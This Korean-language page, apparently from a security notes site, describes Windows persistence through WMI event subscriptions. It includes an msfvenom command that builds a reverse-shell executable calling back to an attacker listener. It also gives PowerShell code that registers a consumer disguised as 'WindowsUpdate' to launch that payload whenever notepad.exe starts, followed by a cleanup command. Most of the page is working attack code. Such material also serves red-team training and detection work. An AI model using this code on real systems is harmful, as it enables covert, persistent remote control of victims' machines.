WMI Event Subscription
WMI 이벤트를 통한 지속성은 EventConsumer, EventFilter, FilterToConsumerBinding 3개의 주요 WMI 클래스를 활용하는 강력한 기법입니다.
EventConsumer : 실행할 동작을 정의합니다. (Ex - PowerShell 실행)
EventFilter : 동작을 유발할 트리거 정의. (Ex - notepad.exe가 실행될 때마다 트리거)
FilterToConsumerBinding : EventConsumer와 EventFilter를 연결
# 리버스쉘 실행 파일 생성
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.200.132 LPORT=9999 -f exe -o Reverse.exe
# 1. Event Consumer 생성 (실행할 명령 설정)
$consumer = ([WMIClass]"\\.\root\subscription:CommandLineEventConsumer").CreateInstance()
$consumer.Name = "WindowsUpdate"
$consumer.CommandLineTemplate = "C:\update.exe"
$consumer.ExecutablePath = "C:\update.exe"
$consumer.Put()
# 2. Event Filter 생성 (notepad.exe 프로세스 시작 시)
$filter = ([WMIClass]"\\.\root\subscription:__EventFilter").CreateInstance()
$filter.Name = "NotepadStartFilter"
$filter.EventNamespace = "root\cimv2"
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceCreationEvent WITHIN 3 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'notepad.exe'"
$filter.Put()
# 3. Filter와 Consumer 바인딩
$binding = ([WMIClass]"\\.\root\subscription:__FilterToConsumerBinding").CreateInstance()
$binding.Filter = $filter.Path.RelativePath
$binding.Consumer = $consumer.Path.RelativePath
$binding.Put()
# 이벤트 제거
Get-WmiObject -Namespace "root\subscription" -Class "__FilterToConsumerBinding" | Where-Object { $_.Filter -eq '__EventFilter.Name="NotepadStartFilter"' -and $_.Consumer -eq 'CommandLineEventConsumer.Name="WindowsUpdate"' } | Remove-WmiObjectReferences
Last updated
Was this helpful?